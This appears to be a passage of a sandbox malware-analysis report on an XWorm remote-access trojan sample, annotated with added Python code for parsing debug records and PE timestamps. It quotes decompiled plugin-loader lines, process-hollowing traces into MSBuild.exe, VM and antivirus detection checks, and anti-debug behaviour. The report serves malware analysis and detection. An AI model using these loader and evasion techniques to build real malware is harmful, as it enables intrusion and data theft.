                mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32##5
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp
                f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp
                mscorlib.pdb
            Source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
                %%.pdb(s(
                mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb(@
                HPjo0C:\Windows\mscorlib.pdb
                ?voC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb
                @vo.pdb
                mscorlib.pdb
                symbols\dll\mscorlib.pdbLb
            Source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
                \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb<
                uild.pdb
                \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb
            Source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
                q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb
                q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb@\
            Note: almost all of this is crash-handling noise. The \??\C:\Windows\symbols\..., \??\C:\Windows\dll\... and ...\MSBuild.PDB variants are the symbol-search probe paths a crashing CLR host generates; the f:\binaries\Intermediate\ndp_msbuild\... path is Microsoft's own build path embedded in MSBuild.exe; the *.ni.pdb names belong to NGEN native images of framework assemblies. Strings such as System.Xml.ni.pdbRSDS# are CodeView RSDS records read as text, where the end of one path runs straight into the next record's signature. The one string that matters for attribution is cy31atwy.pdb in fg.exe's memory: it is the debug path of the assembly fg.exe compiled through csc.exe under %TEMP%\cy31atwy, tying the run-time compile to the sample rather than to anything the host system did.
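            Pulling plain strings out of a dump is how the mangled entries above come about; the structured way to recover PDB references from a memory region or a WER dump is to parse the CodeView RSDS records themselves, which also yields the GUID and age needed to fetch matching symbols. The following is an added example in Python, not code from the Joe Sandbox report: it scans a constructed buffer for RSDS records, extracts GUID, age and path, derives the symbol-server key, and flags PDB paths that point into user-writable directories. The two GUIDs and the System.Xml.ni.pdb record are invented; only the cy31atwy.pdb path is taken from the fg.exe memory strings above.

```python
"""Recover CodeView RSDS debug records (GUID, age, PDB path) from a raw buffer.
Added example, not from the Joe Sandbox report; the dump bytes are constructed."""
import re
import struct
import uuid

# "RSDS" | GUID (16 bytes, first three fields little-endian) | Age (u32 LE) | NUL-terminated path.
_RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260}?\.[pP][dD][bB])\x00", re.DOTALL)


def extract_rsds(buf):
    """Scan buf for RSDS records; return a list of dicts ordered by offset."""
    records = []
    for m in _RSDS_RE.finditer(buf):
        guid = uuid.UUID(bytes_le=m.group(1))  # bytes_le matches the on-disk field order
        (age,) = struct.unpack("<I", m.group(2))
        path = m.group(3).decode("ascii")
        records.append({
            "offset": m.start(),
            "guid": str(guid),
            "age": age,
            "path": path,
            "pdb": path.rsplit("\\", 1)[-1],
            # Symbol-server key: the GUID as 32 upper-case hex digits followed by the age in hex.
            "symsrv_key": f"{guid.hex.upper()}{age:X}",
        })
    return records


def symsrv_path(rec):
    """Relative symbol-store path, e.g. mscorlib.pdb/<GUID><age>/mscorlib.pdb."""
    return f"{rec['pdb']}/{rec['symsrv_key']}/{rec['pdb']}"


def suspicious_pdbs(records, markers=("\\appdata\\local\\temp\\", "\\users\\")):
    """PDB paths under user-writable directories: assemblies built outside a release pipeline."""
    return [r for r in records if any(mk in r["path"].lower() for mk in markers)]


def make_rsds(guid_str, age, path):
    """Write one record the way a linker does (used only to construct the sample below)."""
    return (b"RSDS" + uuid.UUID(guid_str).bytes_le + struct.pack("<I", age)
            + path.encode("ascii") + b"\x00")


# Constructed dump: padding, a record for the run-time-compiled assembly (path from the report),
# junk, an NGEN-image record, then a truncated "RSDS" that must not be reported.
SAMPLE_DUMP = (
    b"\x00" * 8 + b"junk"
    + make_rsds("12345678-1234-5678-9abc-def012345678", 1,
                r"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb")
    + b"\x90" * 5
    + make_rsds("0f0e0d0c-0b0a-0908-0706-050403020100", 2, "System.Xml.ni.pdb")
    + b"RSDS\xff\xff\xff"
)

if __name__ == "__main__":
    for rec in extract_rsds(SAMPLE_DUMP):
        print(f"{rec['offset']:#06x} age={rec['age']} {rec['path']} -> {symsrv_path(rec)}")
    print("suspicious:", [r["pdb"] for r in suspicious_pdbs(extract_rsds(SAMPLE_DUMP))])
```

            Anchoring on the RSDS signature rather than on ".pdb" is what avoids the half-strings seen in the report: the regex consumes the fixed-length GUID and age before it reads the path, so a path's tail can never be glued to the following record's signature.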

            Data Obfuscation

            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, 4.2.fg.exe.5150600.3.raw.unpack, 4.2.fg.exe.2c99014.1.raw.unpack, 8.3.csc.exe.9dbdf0.2.raw.unpack, 8.3.csc.exe.9dbdf0.1.raw.unpack, 8.3.csc.exe.9dbdf0.0.raw.unpack (identical code recovered from six memory unpacks of fg.exe and csc.exe) | Messages.cs .Net Code:
                NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Plugin System.AppDomain.Load(byte[])
                Memory System.AppDomain.Load(byte[])
                Memory
            Note: this is the XWorm plugin loader. A C2 message is split into fields (Pack[...]; Settings.SPL is the delimiter), field 3 carries a base64-encoded, compressed .NET assembly, Helper.Decompress(Convert.FromBase64String(Pack[3])) recovers it, and AppDomain.Load(byte[]) maps it from memory without writing to disk. The late-bound "Invoke" then hands the plugin the client's Host, Port, SPL, KEY and ID so it can reuse the existing C2 parameters. The Microsoft.VisualBasic NewLateBinding calls are the reason the method resolution is dynamic: the target name is looked up at run time, so a static call graph of the loader shows no reference to the plugin's entry point.
            Source: fg.exe | Static PE information: 0xE97D9049 [Thu Feb 18 08:31:05 2094 UTC] (the PE TimeDateStamp decodes to a date decades in the future, so it cannot be a real build time)
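            A future timestamp is cheap to check and easy to over-read, so the following added example in Python (not code from the Joe Sandbox report) does both parts: it reads the COFF TimeDateStamp straight from a PE header and classifies it. The header bytes are constructed; only the value 0xE97D9049 comes from the report. The classification keeps two flags apart on purpose: "future" (later than the analysis clock, impossible for a real build) and "high_bit" (Roslyn's deterministic builds store a content hash in this field with the top bit set, which is why many legitimate .NET binaries also decode to dates after 2038). The flag names and the minimal header layout are assumptions made for the example.

```python
"""Decode a PE TimeDateStamp and flag values a build clock could not have produced.
Added example, not from the Joe Sandbox report; the PE header bytes are constructed."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
REPORT_TS = 0xE97D9049  # value from the report


def pe_timestamp(data):
    """Return the COFF TimeDateStamp of a PE image given its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (ts,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return ts


def decode_timestamp(ts):
    """Seconds since the Unix epoch -> aware UTC datetime (no platform limits, unlike fromtimestamp)."""
    return EPOCH + timedelta(seconds=ts)


def assess_timestamp(ts, now):
    """Return (datetime, flags): 'future' if later than now, 'high_bit' if bit 31 is set
    (Roslyn deterministic builds write a content hash with the top bit set), 'zero' if stripped."""
    when = decode_timestamp(ts)
    flags = []
    if when > now:
        flags.append("future")
    if ts & 0x80000000:
        flags.append("high_bit")
    if ts == 0:
        flags.append("zero")
    return when, flags


def build_minimal_pe(ts):
    """Constructed DOS stub + PE signature + COFF header, just enough for pe_timestamp()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the stub
    # Machine=i386, 2 sections, TimeDateStamp, symtab ptr, symbol count, opt-hdr size, characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 2, ts, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    ts = pe_timestamp(build_minimal_pe(REPORT_TS))
    when, flags = assess_timestamp(ts, datetime.now(timezone.utc))
    print(hex(ts), when.strftime("%a %b %d %H:%M:%S %Y UTC"), flags)
```

            On the report's value both flags fire, which is the expected outcome for a .NET sample: treat "future" as a reason to look further (here the run-time compilation and hollowing already settle the question) rather than as a verdict on its own, and treat a lone "high_bit" on a managed binary as informational.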
            Source: C:\Users\user\Desktop\fg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_011B7DA0 push eax; iretd 12_2_011B7DA1 (an iretd in user-mode code faults rather than returns; this is junk or anti-disassembly, not a real control-flow path)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll (the assembly produced by the csc.exe run above; its debug path cy31atwy.pdb is the one later found in fg.exe memory)
            Source: C:\Users\user\Desktop\fg.exe | Process information set: NOOPENFILEERRORBOX (21 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
            Note: these are SetErrorMode(SEM_NOOPENFILEERRORBOX) calls, which the CLR loader commonly issues around its own library probing; the counts track how many DLL loads each process performed rather than deliberate error suppression by the sample.
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (28 identical entries)
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara match File source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\fg.exe Memory allocated: 1270000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\fg.exe Memory allocated: 2C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\fg.exe Memory allocated: 2BB0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 11B0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2BF0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2A00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\fg.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 902
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 8953
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 2.4 %
            Source: C:\Users\user\Desktop\fg.exe TID: 4712 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436 Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3108 Thread sleep count: 902 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3108 Thread sleep count: 8953 > 30
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\fg.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: Amcache.hve.19.dr Binary or memory string: VMware
            Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin
            Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.19.dr Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.19.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.19.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.19.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.19.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.19.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.19.dr Binary or memory string: vmci.sys
            Source: Amcache.hve.19.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.19.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.19.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.19.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.19.dr Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.19.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\fg.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\fg.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\fg.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, LoadApiName.cs Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num2, length, 12288, 64)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: C:\Users\user\Desktop\fg.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\fg.exe File written: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.0.cs
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000
            Source: C:\Users\user\Desktop\fg.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A78008
            Source: C:\Users\user\Desktop\fg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"
            Source: C:\Users\user\Desktop\fg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\fg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP"
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2858010700.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
            Source: C:\Users\user\Desktop\fg.exe Queries volume information: C:\Users\user\Desktop\fg.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\fg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.19.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.19.dr Binary or memory string: msmpeng.exe
            Source: Amcache.hve.19.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.19.dr Binary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: csc.exe PID: 6364, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 516, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED

            Remote Access Functionality

            barindex
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE
